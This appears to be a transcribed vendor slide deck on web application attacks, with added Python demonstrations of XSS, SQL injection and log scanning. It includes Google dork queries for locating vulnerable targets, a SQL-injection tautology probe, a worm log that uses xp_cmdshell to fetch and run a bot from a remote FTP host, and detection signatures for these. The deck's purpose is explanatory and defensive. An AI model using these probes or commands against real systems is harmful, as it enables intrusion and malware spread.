The Hacking Evolution: New Trends in Web Application Exploits and Vulnerabilities Brian Christian, S - PowerPoint PPT Presentation

1
The Hacking Evolution: New Trends in Web Application Exploits and Vulnerabilities
Brian Christian, Senior Security Engineer and Co-Founder, S.P.I. Dynamics
2
Agenda
  • Part 1: Introduction - How on earth did we get to this point?
  • Part 2: Identifying the Problem - How does this stuff happen?
  • Part 3: Key Application Vulnerabilities - Past, present and future
  • Part 4: Fixing the Problem - Detecting application vulnerabilities
    and implementing a secure coding process
  • Part 5: More information and online resources
  • Part 6: Q&A

3
Part One
  • Introduction
  • Who We Are - SPI Dynamics in a nutshell
  • Application Security - How did we get to this point?

4
SPI Dynamics
The Leader In Web Application Security Assessment
  • We manufacture and license WebInspect, our
    industry leading web application security
    assessment product, to enterprises, consultants,
    and other institutions, both directly and via
    global partners.
  • We own the world's leading database of web application security
    vulnerabilities, SecureBase. SecureBase is updated frequently by
    SPI Labs, our U.S.-based research & development organization.

5
Web Sites
Simple, single server solutions
  • Web Server
  • HTML
  • CGI

[Diagram: Browser talking directly to the Web Server]
6
Web Applications
Very complex architectures, multiple platforms, multiple protocols

[Diagram: the tiers of a web application]
  • Browser / Wireless client
  • Web Servers: Presentation Layer, Media Store
  • Application Server: Business Logic, Content Services
  • Web Services
  • Database Server: Customer Identification, Access Controls,
    Transaction Information, Core Business Data
7
Common Web Applications
8
The Absolute Truth
  • All code has bugs regardless of platform,
    language or application.
  • From a Microsoft to a Mom and Pop's home-brewed application, all
    code has bugs.
  • Some bugs are functionality bugs, which are
    discovered by QA.
  • Other bugs are security bugs, which largely go
    unidentified.
  • As long as functionality is the main objective
    and not security, there will always be
    vulnerabilities in computer applications.

9
Why These Things Happen
This is all the stuff that your application is
supposed to do.
10
Why Web Application Attacks Occur
The Web Application Security Gap
Application Developers and QA Professionals Don't Know Security
Security Professionals Don't Know the Applications
"As a Network Security Professional, I don't know how my company's
web applications are supposed to work, so I deploy a protective
solution but don't know if it's protecting what it's supposed to."
"As an Application Developer, I can build great features and
functions while meeting deadlines, but I don't know how to develop
my web application with security in mind."
11
Web Applications Breach the Perimeter
[Diagram: request path from the INTERNET through the DMZ to the
TRUSTED INSIDE and CORPORATE INSIDE zones]
  • INTERNET: HTTP, IMAP, SSH, POP3, FTP, TELNET
  • DMZ (Web Server): the firewall only allows PORT 80 (or 443 SSL)
    traffic from the internet to the web server.
  • TRUSTED INSIDE (Application Server): the firewall only allows
    applications on the web server to talk to the application server.
  • CORPORATE INSIDE (Database): the firewall only allows the
    application server to talk to the database server.
12
Web Applications Invite Public Access
"Today over 70% of attacks against a company's website or web
application come at the Application Layer, not the network or
system layer."
- Gartner Group
13
Web Application Risk
Web application incidents cost companies more than $320,000,000 in
2001.
Forty-four percent (223 respondents) to the 2002 Computer Crime and
Security Survey were willing and/or able to quantify their financial
losses. These 223 respondents reported $455,848,000 in financial
losses.
- 2002 Computer Crime and Security Survey, Computer Security
Institute / San Francisco FBI Computer Intrusion Squad
14
Part Two
  • Identifying the Problem
  • What are the primary vulnerabilities?
  • How and why they occur

15
Web Application Vulnerabilities
Web application vulnerabilities occur in multiple areas.
Application:
  • Parameter Manipulation
  • Cross-Site Scripting
  • SQL Injection
  • Buffer Overflow
  • Reverse Directory Traversal
  • JAVA Decompilation
  • Path Truncation
  • Hidden Web Paths
  • Cookie Manipulation
  • Application Mapping
  • Backup Checking
  • Directory Enumeration
Administration:
  • Extension Checking
  • Common File Checks
  • Data Extension Checking
  • Backup Checking
  • Directory Enumeration
  • Path Truncation
  • Hidden Web Paths
  • Forceful Browsing
Platform:
  • Known Vulnerabilities
16
Cross Site Scripting
  • (or XSS)

17
Cross Site Scripting (XSS)
  • Cross-site scripting (also known as XSS or CSS) occurs when
    dynamically generated web pages display input that is not
    properly validated.
  • A user passes input in the form of a parameter to the web server.
  • The web server returns the user-provided input back to the user
    without proper encoding.
  • Again, a demonstration!
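As an added example (not from the presentation), here is the reflection pattern the slide describes, written in Python: a constructed search page echoes the q parameter into both a text node and an attribute value, first verbatim and then HTML-encoded. The function names render_unsafe and render_safe are my own.

```python
import html
from urllib.parse import parse_qs

# Constructed example page: a search form that reflects the "q" parameter.

def get_param(query_string: str, name: str = "q") -> str:
    """Pull one parameter out of a URL query string, as a web server would."""
    return parse_qs(query_string, keep_blank_values=True).get(name, [""])[0]

def render_unsafe(query_string: str) -> str:
    """Reflects the input verbatim into the page: the XSS pattern on the slide.
    Both the text context (<p>) and the attribute context (value="...") are
    exposed, so a '<' or a '"' in the input changes the page structure."""
    q = get_param(query_string)
    return f'<p>Results for: {q}</p><input name="q" value="{q}">'

def render_safe(query_string: str) -> str:
    """Same page, but the input is HTML-encoded before it is placed in the
    response. quote=True also encodes quotes, which is what protects the
    attribute context; encoding only < and > would not be enough there."""
    q = html.escape(get_param(query_string), quote=True)
    return f'<p>Results for: {q}</p><input name="q" value="{q}">'

if __name__ == "__main__":
    probe = "q=<script>alert(1)</script>"
    print(render_unsafe(probe))  # the tag lands in the page unchanged
    print(render_safe(probe))    # &lt;script&gt;... is shown as text
```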

18
SQL Injection
19
SQL Injection Defined
  • SQL injection is a technique for exploiting web
    applications that use client-supplied data in SQL
    queries without stripping potentially harmful
    characters first.
  • Allow me to demonstrate!
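Added example, not the presenter's code: the same login query written with string concatenation (the pattern the slide defines) and with a parameterized query, run against a constructed in-memory SQLite table. It also shows why binding parameters is the fix rather than stripping characters: there is no character list to get wrong.

```python
import sqlite3

# Constructed demo table in memory; plaintext passwords are only for the demo.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", "s3cret", "admin"), ("bob", "hunter2", "user")])
    return conn

def login_unsafe(conn, username: str, password: str) -> list:
    """Client-supplied data concatenated straight into the SQL text.
    A quote character in the input ends the string literal early and the
    rest of the input is parsed as SQL, rewriting the WHERE clause."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]

def login_safe(conn, username: str, password: str) -> list:
    """Parameterized query: the values travel separately from the SQL text,
    so the input is only ever compared as data and never parsed as SQL."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]

if __name__ == "__main__":
    db = make_db()
    tautology = "' OR '1'='1"   # classic probe: makes the WHERE clause always true
    print(login_unsafe(db, "alice", "wrong"))       # []
    print(login_unsafe(db, tautology, tautology))    # ['alice', 'bob']
    print(login_safe(db, tautology, tautology))      # []
    print(login_safe(db, "alice", "s3cret"))         # ['alice']
```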

20
Part Three
  • Key Application Vulnerabilities
  • Past, Present and Future
  • Google Hacking

21
Google Hacking
  • More than searching for great pr0n.

22
Google Hacking
  • Find vulnerable sites using Google (old method, new life)
  • Example search queries:
  • filetype:mdb inurl:admin - 180 results
  • filetype:xls inurl:admin - 14,100 results
  • "ORA-00921: unexpected end of SQL command" - 3,470 results
  • allintitle:Netscape Enterprise Server Home Page - 431 results

23
Google Hacking
  • Take this method a step further and use it to narrow your attack
    victims.
  • inurl:id filetype:asp site:gov - 572,000 results
  • inurl:id filetype:asp site:com - 7,150,000 results
  • inurl:id filetype:asp site:org - 3,240,000 results
  • Use this list as a baseline for identifying SQL injection
    vulnerabilities

25
Google Hacking
  • Took 1 hour of coding
  • 500 vulnerable sites were found in 1 minute and
    26 seconds

26
Google Hacking
[Diagram: a loop of "Find next victim" -> "Exploit victim" ->
"Exploit victim" ...]
  • Application Worm

27
The Past, the Present, and the Future of Hacking
  • How prolific could this whole scenario be?

28
Where We've Been: The Past
  • Since most sites were static HTML, not much to do
    but try to obtain root / admin privileges on the
    machine or deface the website.
  • This proved for some great comedy.

29
Where We're At: The Present
  • Since more dynamic and unique content has been
    added to websites, and users demand even MORE
    functionality so that they can do everything
    electronically, insecure content was added at an
    expedited pace!
  • And users and management demand even more!

30
Where We're Going: The Future
  • Application hacking is becoming more complex as
    applications are becoming more complex. The
    possibilities are endless when it comes down to
    what can you exploit in web applications.
  • Take for instance Application Worms, or Web Application Worms.

31
Enter the Santy Worm
  • Perl.Santy is a worm written in Perl script that attempts to
    spread to Web servers running versions of the phpBB 2.x bulletin
    board software affected by the Viewtopic.PHP PHP Script Injection
    Vulnerability.
  • Other systems are not affected. If successful, the worm copies
    itself to the server and overwrites the files with the following
    extensions: .asp, .htm, .jsp, .php, .phtm, .shtm
  • The worm uses the Google search engine to find potential new
    infection targets. Google has now implemented blocking of
    Perl.Santy search requests, which is expected to greatly reduce
    the worm's ability to propagate and lower the risk of further
    infections.

32
Enter the Santy Worm
  • Aliases: Perl.Santy.A (Computer Associates), Santy (F-Secure),
    Net-Worm.Perl.Santy.a (Kaspersky), Perl/Santy.worm (McAfee),
    PHP/Santy.A.worm (Panda), Perl/Santy-A (Sophos), WORM_SANTY.A
    (Trend Micro)
  • Systems affected: UNIX, LINUX, Windows 2000, Windows 95, Windows
    98, Windows Me, Windows NT, Windows Server 2003, Windows XP

33
But There Are Even Worse Worms
  • New evidence suggests that a new worm has been
    discovered in the wild that takes advantage of
    SQL Injection vulnerabilities.
  • A Jan 5th post on seclists.org by Maxime Ducharme describes an
    attack made on his company's machines, where a hybrid worm (a
    cross between Santy and Randex) was identified in his logs.

34
Google search URL used to find targets (punctuation lost in
extraction; the query is allinurl:"viewtopic.php"):
http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A%22viewtopic.php%22
35
Log Entries
  • exec MASTER..xp_cmdshell 'mkdir
    systemroot\system32\Macromed\lolx\'
  • exec MASTER..xp_cmdshell 'echo open y.y.y.y 21
    systemroot\system32\Macromed\lolx\blah.jkd'
  • exec MASTER..xp_cmdshell 'echo USER hahajk
    hahaowned systemroot\system32\macromed\lolx\
    blah.jkd'
  • exec MASTER..xp_cmdshell 'echo get rBot.exe
    systemroot\system32\Macromed\lolx\arcdlrde.exe
    systemroot\system32\Macromed\lolx\blah.jkd'
  • exec MASTER..xp_cmdshell 'echo quit
    systemroot\system32\Macromed\lolx\blah.jkd'
  • exec MASTER..xp_cmdshell 'ftp.exe -i -n -v
    -ssystemroot\system32\Macromed\lolx\blah.jkd'
  • exec MASTER..xp_cmdshell 'del
    systemroot\system32\Macromed\lolx\blah.jkd'
  • exec MASTER..xp_cmdshell
    'systemroot\system32\Macromed\lolx\arcdlrde.exe

36
Even Hits Close to Home
  • Our R&D researcher Bob Auger, who runs CGISECURITY.NET, found
    suspicious entries in his logs.
  • He was running FreeBSD.
  • So like all good site operators he followed them
    back to the IRC channel that they were using to
    control the worm.
  • He was unable to follow them after the 3rd hop
    they made to control the worm.

37
Fact or Fiction? FACT!
  • Web Application Worms are the new emerging
    threat.
  • We are beginning to see the first generation of
    these emerging threats.
  • Current Anti-virus solutions are reactive, not
    proactive.
  • Worms could be propagating right now, but very few people check
    their web logs or scan their sites looking for SQL injection.
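Added example, not from the presentation: a small log scanner of the kind the slide says too few people run. It URL-decodes each request line and flags the xp_cmdshell / exec MASTER.. indicators seen in the log entries on slide 35, plus the quote-OR-quote tautology. The log lines are constructed (documentation IP ranges), and SAMPLE_LOG, SIGNATURES and scan_log are my names.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines; not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [05/Jan/2005:10:12:01 -0500] "GET /index.asp?id=7 HTTP/1.0" 200 5123',
    '203.0.113.5 - - [05/Jan/2005:10:12:03 -0500] "GET /index.asp?id=7;exec%20master..xp_cmdshell%20%27echo%20x%27 HTTP/1.0" 500 312',
    '198.51.100.9 - - [05/Jan/2005:10:15:44 -0500] "GET /viewtopic.php?t=12 HTTP/1.1" 200 8841',
    '198.51.100.9 - - [05/Jan/2005:10:15:50 -0500] "GET /login.asp?user=admin%27%20OR%20%271%27=%271 HTTP/1.1" 200 640',
]

# Indicators in priority order. The first two are exactly what the worm left
# in the slide-35 log entries; the third is the classic tautology that turns
# a WHERE clause into "always true".
SIGNATURES = [
    ("xp_cmdshell", re.compile(r"xp_cmdshell", re.I)),
    ("master_exec", re.compile(r"exec\s+master\.\.", re.I)),
    ("tautology",   re.compile(r"'\s*or\s+'", re.I)),
]

# client IP at the start of the line, then the request target after the method
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD)\s+(\S+)')

def scan_log(lines):
    """Return (line_no, client_ip, signature) for each request whose decoded
    path+query matches a signature. Decoding first matters: quotes and spaces
    arrive percent-encoded, so a raw substring match on the line misses them."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.match(line)
        if not m:
            continue
        ip, request = m.group(1), unquote(m.group(2))
        for name, pattern in SIGNATURES:
            if pattern.search(request):
                hits.append((n, ip, name))
                break   # one finding per line is enough for triage
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print("line %d from %s: %s" % hit)
```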

38
Part Four - Fixing the Problem
  • Detecting Application Vulnerabilities
  • And Implementing a Secure Coding Process
  • Instituting a secure coding process
  • How we build the products to make the process work

39
Enterprise-Wide Web Application Security
  • Web Application Security testing must be applied
    in all phases of the Application Lifecycle and by
    all constituencies throughout the enterprise
    Auditors, Application Developers, QA and Security
    Operations.

40
Enterprise-Wide Web Application Security
Application Developers
  • Must have clear-cut security requirements to follow during
    Development and QA phases
  • Need to run automated tests on code during
    Development phase
  • Must utilize secure code for re-use
  • Require automated testing products that integrate
    into current environment

41
Enterprise-Wide Web Application Security
Quality Assurance Professionals
  • Must test applications not only for functionality
    but also for security
  • Must test environments for potential flaws and
    insecurities
  • Must provide detailed security flaw reports to
    development
  • Require automated testing products that integrate
    into current environment

42
Enterprise-Wide Web Application Security
Security Auditors and Risk and
Compliance Officers
  • Help define regulatory requirements during the
    Definition phase of the Application Lifecycle
  • Assess applications once they are in the
    Production phase to validate compliance
  • Must act as resource for what is and is not
    acceptable

43
Enterprise-Wide Web Application Security
Security Operations
  • Must continually test applications in a real-world environment
    to assess the impact of ongoing code changes
  • Must look for all levels of web vulnerabilities: Platform,
    Informational and Application

44
Part Five
  • Other Online Resources
  • Websites and mailing lists on the net

45
Websites
  • SPI Dynamics - www.spidynamics.com
  • Web Application Security Consortium - www.webappsec.org
  • CGISecurity.net - http://www.cgisecurity.net/
  • Open Web Application Security Project - www.owasp.org
  • WebAppSec mailing list - SecurityFocus

46
Questions?
47
Contact
SPI Dynamics, Inc., 115 Perimeter Center Place, Suite 1100,
Atlanta, GA 30346
For a free WebInspect(TM) 15-day trial download, visit
www.spidynamics.com